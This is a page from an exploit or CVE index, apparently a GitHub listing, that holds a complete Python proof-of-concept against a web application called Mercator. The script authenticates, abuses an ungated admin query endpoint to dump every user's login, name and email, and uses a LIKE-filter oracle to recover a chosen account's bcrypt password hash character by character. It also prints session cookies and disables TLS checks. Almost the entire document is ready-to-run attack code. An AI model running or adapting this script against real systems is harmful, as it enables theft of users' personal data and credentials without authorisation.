5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / query_engine_dump.py PY
#!/usr/bin/env python3
"""
Mercator Query Engine extraction tool.

Reads arbitrary models through the ungated POST /admin/queries/execute
endpoint (QueryController::execute). Default action: enumerate every user
account with its PII (id, login, name, email, granularity).

    ./bin/python3 query_engine_dump.py --base http://127.0.0.1:8000 \
        --user audit --password 'Audit123!'

Options:
    --json              emit JSON instead of a table
    --extract-hash ID   also recover the bcrypt password hash of account ID
                        (case-folded: the target column uses a CI collation)
"""
import argparse
import json
import re
import string
import sys
import warnings

# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")

import requests
import urllib3
urllib3.disable_warnings()

LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
BCRYPT_ALPHABET = "$./" + string.digits + string.ascii_uppercase + string.ascii_lowercase
PII_FIELDS = ["id", "login", "name", "email", "granularity"]


# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────

def log(message):
    """Status banner — emitted on stderr so stdout stays pure result data."""
    print(message, file=sys.stderr)


def die(message):
    log(f"[!] {message}")
    sys.exit(1)


def login(session, base, user, password):
    """Authenticate, print the login section, and return the CSRF token."""
    r = session.get(f"{base}/login", timeout=10)
    m = LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found on /login")
    r = session.post(
        f"{base}/login",
        data={"_token": m.group(1), "login": user, "password": password},
        timeout=10, allow_redirects=True,
    )
    if r.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")
    m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found after login")
    csrf = m.group(1)
    log("[+] login")
    log(f"    user       : {user}")
    for c in session.cookies:
        log(f"    cookie     : {c.name}={c.value}")
    log(f"    csrf token : {csrf}")
    return csrf


# ── Query engine ────────────────────────────────────────────────────────────

def query(session, base, csrf, dsl):
    """Submit a DSL to the query engine and return the decoded JSON."""
    r = session.post(
        f"{base}/admin/queries/execute",
        headers={"X-CSRF-TOKEN": csrf, "Accept": "application/json"},
        data=dsl, timeout=15,
    )
    if r.status_code != 200:
        die(f"/admin/queries/execute returned HTTP {r.status_code}")
    return r.json()


def fetch_accounts(session, base, csrf):
    """Return every user account with its PII fields."""
    data = query(session, base, csrf,
                 {"from": "users", "output": "list", "select[]": PII_FIELDS})
    return data.get("rows", [])


def extract_hash(session, base, csrf, account_id):
    """Recover an account's bcrypt hash via the filter-side LIKE oracle."""
    known = ""
    while len(known) < 60:
        match = None
        for c in BCRYPT_ALPHABET:
            dsl = {
                "from": "users", "output": "list", "select[]": ["id"],
                "filters[0][field]": "id",
                "filters[0][operator]": "=",
                "filters[0][value]": str(account_id),
                "filters[1][field]": "password",
                "filters[1][operator]": "like",
                "filters[1][value]": known + c + "%",
            }
            if query(session, base, csrf, dsl)["meta"]["count"] >= 1:
                match = c
                break
        if match is None:
            break
        known += match
    return known


def render_table(accounts):
    widths = {
        f: max([len(f)] + [len(str(a.get(f, ""))) for a in accounts])
        for f in PII_FIELDS
    }
    row = lambda values: "  ".join(
        str(v).ljust(widths[f]) for f, v in zip(PII_FIELDS, values)
    )
    print(row(PII_FIELDS))
    print("  ".join("-" * widths[f] for f in PII_FIELDS))
    for a in accounts:
        print(row([a.get(f, "") for f in PII_FIELDS]))


def main():
    ap = argparse.ArgumentParser(description="Mercator Query Engine extraction tool")
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--json", action="store_true", help="emit JSON instead of a table")
    ap.add_argument("--extract-hash", type=int, metavar="ID",
                    help="recover the bcrypt hash of account ID")
    args = ap.parse_args()

    session = requests.Session()
    session.verify = False
    csrf = login(session, args.base, args.user, args.password)

    accounts = fetch_accounts(session, args.base, csrf)
    log(f"[+] {len(accounts)} account(s) extracted from the users model")

    if args.extract_hash is not None:
        digest = extract_hash(session, args.base, csrf, args.extract_hash)
        log(f"[+] account {args.extract_hash} password hash: {digest}")
        for a in accounts:
            if a.get("id") == args.extract_hash:
                a["password_hash"] = digest

    if args.json:
        print(json.dumps(accounts, indent=2))
    else:
        render_table(accounts)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        die("interrupted")
    except requests.RequestException as e:
        die(f"could not reach Mercator: {e}")